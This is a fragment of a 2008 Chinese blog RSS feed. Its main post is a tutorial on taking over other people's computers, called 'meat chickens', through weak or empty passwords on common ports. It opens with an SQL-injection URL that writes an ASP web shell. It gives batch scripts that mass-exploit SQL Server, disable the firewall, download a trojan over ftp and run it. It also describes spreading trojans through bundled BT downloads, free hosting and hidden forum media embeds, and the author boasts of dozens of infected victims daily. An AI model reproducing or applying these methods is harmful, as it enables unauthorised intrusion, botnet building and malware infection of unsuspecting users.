<DIV><A href="http://127.0.0.1/dblogin123.asp?username=123" target=_blank><FONT face=黑体 color=#eeeeee size=2>http://127.0.0.1/dblogin123.asp?username=123</FONT></A><WBR><FONT face=黑体 color=#eeeeee size=2>';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''&lt;%25execute(request("a"))%25&gt;''%20';-- </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>//更新表内容 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>Update films SET kind = 'Dramatic' Where id = 123 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>//删除内容 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>delete from table_name where Stockid = 3</FONT></DIV>]]></description>
<author>xuliang</author>
<pubDate>2008-2-3 22:38:00</pubDate>
</item>
<item>
<title><![CDATA[各端口抓鸡方法]]></title>
<link>http://xuliang.bokemx.com/200823223115.html</link>
<description><![CDATA[<FONT face=黑体 color=#ffffff size=2>3389端口抓肉鸡（适合新手）（抓不了国外肉鸡） <BR>现在国内网络上流传着一种克隆版的XP，安装后会默认开启一个账号为new,密码为空的账户，而且基本上都是开着3389的，我们就可以利用这一点来抓肉鸡。首先用端口扫描工具（如S扫）扫一段IP的3389端口，扫完后就直接用远程桌面连接开放3389的机器（也可以把结果保存为文本文件，用批量生成3389连接的工具来连接），然后输入账号new登入，如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~这种方法只针XP系统，如果遇到2000或者2003系统就不要试了呵呵。缺点也很明显，如果别人不是用new账号登入XP的，你再登入上去就会把他挤出去（XP只支持单用户登入，用户登入需要用工具开），或者电脑前有人你就不可能去打开IE下载木马了。 <BR><BR>2、扫135端口抓肉鸡 <BR>首先先用端口扫描器扫一段IP的135端口，然后把结果保存，再用NTSCAN过滤有弱口令的机器，最后用recton开telnet传马。因为现在135和445端口都被防火墙屏蔽了，只能扫本地的135肉鸡，要抓外地的只能用外地的135肉鸡来扫。（详细动画可以去黑客网站搜索135） <BR><BR>3、扫445端口抓肉鸡 <BR>和扫135抓肉鸡差不多，首先先用端口扫描器扫一段IP的445端口，然后把结果保存，再用NTSCAN过滤有弱口令的机器，最后用啊D工具包开共享传马。因为现在135和445端口都被防火墙屏蔽了，只能扫本地的445肉鸡，要抓外地的只能用外地的445肉鸡来扫。（详细动画可以去黑客网站搜索445） <BR><BR>4、1433端口批量溢出抓肉鸡 <BR>这个方法可以实现全自动抓鸡，不过现在太多人搞，成功率已经不高了。 <BR>要用到的工具：S扫 sqlhello.exe nc.exe 批处理文件 <BR>首先先写个批处理，打开记事本，把以下代码复制修改后，储存为扫描+溢出.bat文件 <BR>@echo off <BR>for /f "eol=; tokens=1,2 delims= " %%i in (tt.txt) do s.exe tcp %%i %%j 1433 1000 /save <BR>@echo off <BR>for /f "eol=; tokens=1 delims= " %%i in (Result.txt) do sqlhello %%i 1433 xxx.xxx.xx.xx 556 <BR>还要新建一个tt.txt，里面你要扫的IP段，格式为XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX,中间是空格 <BR>1433是要扫描的端口，1000是扫描线程数 ，do sqlhello %%i 1433 xxx.xxx.xx.xx 556 这个里的XXX添你的IP，556是后面NC监听的端口 <BR>然后再写个批处理 <BR>@echo off <BR>Nc -l -vv -p 556&gt;daima.txt <BR>echo username&gt;&gt;daima.txt <BR>echo password&gt;&gt;daima.txt <BR>echo bin&gt;&gt;daima.txt(以2进制传输数据) <BR>echo get xxx.exe(你的木马的文件名,要放在根目录下)&gt;&gt;daima.txt <BR>echo bye&gt;&gt;daima.txt <BR>net stop sharedaccess(关闭WINDOWS自带防火墙) <BR>ftp -s:daima.txt <BR>xxx.exe(也是填你木马的文件名) <BR>del daima.txt <BR>注意上面的代码回车符别删掉，要不然就没法下你的马了。 <BR>更多的代码去</FONT><A href="http://publish.it168.com/2005/0731/20050731019501.shtml" target=_blank ="http://www.bokemx.com/metalred821227/showLinkBubble(this);return false" link="http://publish.it168.com/2005/0731/20050731019501.shtml"><FONT style="FONT-SIZE: x-small; LINE-HEIGHT: 1.3em" face=黑体 color=#ffffff>http://publish.it168.com/2005/0731/20050731019501.shtml</FONT><WBR></A><WBR><FONT face=黑体 color=#ffffff size=2>这里看 <BR>上面的步骤都搞好后，就可以开始扫肉鸡了。 <BR>先打开多个NC.bat,然后再打开扫描+溢出.bat,然后你就可以去睡大觉了。自动扫描，扫描完后自动溢出，溢出后还自动下马执行，爽吧！所以这里讲详细点，呵呵。还有42 21端口也可以这样溢出，只要用这些端口的溢出工具就好了，详细动画可以去黑客网站搜索1433。 <BR>忘了说，上面的工具和批处理什么的都要放在同一个文件夹下。 <BR><BR>先休息一下，打这么多字累死了 <BR><BR>继续 <BR><BR>5、扫1433抓肉鸡之方法2 <BR>要用到的工具：端口扫描器 X-scan SQL综合利用工具 <BR>上面我们说过了，1433溢出现在成功率已经不高了，所以我们可以用另一种方法。 <BR>开了1433端口的机器一般都装了SQL，所以我们可以猜测SQL弱口令来抓1433肉鸡。 <BR>首先先用端口扫描器扫一段IP的1433端口，然后结果保存为文本文件，接着用X-scan导入这些开了1433的IP，然后在扫描参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了，其他不要勾。然后在插件设置-端口相关设置-待检测端口这一栏，只填1433端口。然后就可以开始扫描了。扫描完成后会有个报告，列出了有弱口令的机器，然后打开SQL综合利用工具，输入你扫到的弱口令来连接，接着打开SQL综合利用工具-利用目录，上传你的木马，然后在用DOS命令执行你的木马就OK了。 <BR><BR>6、用WINNTAutoAttack扫SA弱口令抓肉鸡 <BR>其实这个原理和上面一样，效率也没上面的高，只是想让大家知道下，呵呵。 <BR>工具：WINNTAutoAttack SQL综合利用工具 <BR>打开WINNTAutoAttack，找一段IP添上，然后只勾上设置下的仅对PING检查成功的机器进行检测和SQL列出密码为空的SA账号，接着开始扫描，扫完后，用 SQL综合利用工具连上传马执行就好了。 <BR><BR>7、扫4899空口令抓肉鸡 <BR>工具：端口扫描器 4899探测器 Radmin <BR>首先先用端口扫描器扫一段IP的4899端口，然后用4899探测器导入开了4899端口的IP，接着扫空令，最后用Radmin连接有空口令的机器，带开文件管理，上传的你木马运行就OK了。详细动画可以去黑客网站搜索4899 <BR><BR>8、扫5900端口抓VNC肉鸡 <BR>工具：VNC扫描器 VNC连接器 <BR>首先用VNC扫描器扫描一段IP，扫描格式为vscan.exe（扫描器文件名） -i 219.0.0.0-219.255.255.255（扫描IP段） -p 5900 -vnc -vv <BR>扫描完成后会在扫描器所在的同一文件夹生成一个文本文件，打开后有一列IP，IP后面的有一些单词比如patched,banned,vulnerable,只有单词为vulnerable才能连接。接着就用VNC连接器连接，下面就不用多说了吧？ 详细动画可以去黑客网站搜索VNC <BR><BR>接下来说说挂马抓肉鸡吧。方法有很多，比如BT挂马、免费空间挂马、迅雷挂马等等，有些我也还不会，呵呵。下面就介绍几种我会的。 <BR><BR>1、BT挂马 <BR>顾名思义，就是把你的木马发布到BT网站让人下载。当然如果只把单纯的木马文件发布上去效果肯定不好，而且现在一般的BT网站也不让发布EXE文件。所以我们需要一些隐藏的手法。我们可以先把木马用捆绑器和一些电影、音乐、游戏捆绑在一起，再压缩成RAR文件发布，谁在开始下载时会知道RAR里有木马呢？当他费了好大劲下载完，打开发现是EXE的格式后，总有些菜鸟会不想辜负自己花费的时间而忍不住打开吧？尤其是下XXX片的时候 当然你也可以做个网页木马，然后把你网页木马的地址插入到你发布的文件中（不是所有文件都可以这样的，我只知道RM和EXE文件可以插入），别人下载打开后同时也会带开你的网页木马，如果他的系统没有补供你网页木马所利用的漏洞的话，那他就会中你的马了。有些朋友可能会想，我把木马和其他文件捆绑后格式保持为那个文件（比如RM捆绑木马后保持RM格式），那样别人不就不会怀疑了吗？呵呵，如果真有这样的好事那我上面何不说把木马和BT种子文件绑在一起发布，那样你肉鸡不抓疯了才怪~~所以在这里说一下，木马和其他文件捆绑后生成的文件只能为EXE格式的，除非你有你所捆绑文件的格式的溢出漏洞，那样才能把生成后的文件格式保持为你所捆绑文件的格式。不过这样的漏洞现在很少，大多都被补了，就算有别人也不一定会公开，为什么想想就知道了吧。在这里就说一个最近的RAR溢出漏洞，针对winrar3.6版本以下的所有版本，只要你winrar版本低于3.6，运行绑了牧马的RAR文件后就会中马。此类木马症状为：运行RAR文件后会弹出一个什么什么损坏还是错误的对话框，然后RAR文件体积变小，减少的体积就为木马的体积。然后再次打开这个RAR文件一切正常，不会弹出错误对话框。在这里提醒下各位赶快更新下WINRAR版本，小心中马哈。 :lol <BR><BR>2、免费空间挂马 <BR>其实和BT差不多，就是把做好的木马上传到你申请的免费空间，然后到论坛发些诱惑性的帖子让别人下载你的木马。优点是不用像BT那样做种子，那样不仅要开着电脑，还影响网速。我这几天就是这样挂的，弄个免费空间，上传个木马，到2个XXX论坛发个帖子，每天睡前一顶，才挂了几天，现在每天肉鸡都保持在40-60只。而且大部分都是美国的，很容易吧？ :lol :lol <BR><BR>3、用RM在论坛挂马 <BR>首先你弄个只有几秒钟的RM文件，然后插入你的网页木马，接着上传到你的空间，然后到一些支持插入RM连接的论坛发帖子，点插入real media 播放器，输入你的RM牧马地址，然后高度宽度都设为1（这部是为了保证隐蔽性:lol ），然后点发贴，这样别人在浏览你的帖子就会运行你的RM木马，而我们前面把高和宽设为1，在帖子里RM连接就看不到了。这样别人就不知不觉中了我们的马了:lol 好像FLASH木马也可以这样的，我没试过，大家可以去研究下</FONT>]]></description>
<author>xuliang</author>
<pubDate>2008-2-3 22:31:00</pubDate>
</item>

</channel>
</rss>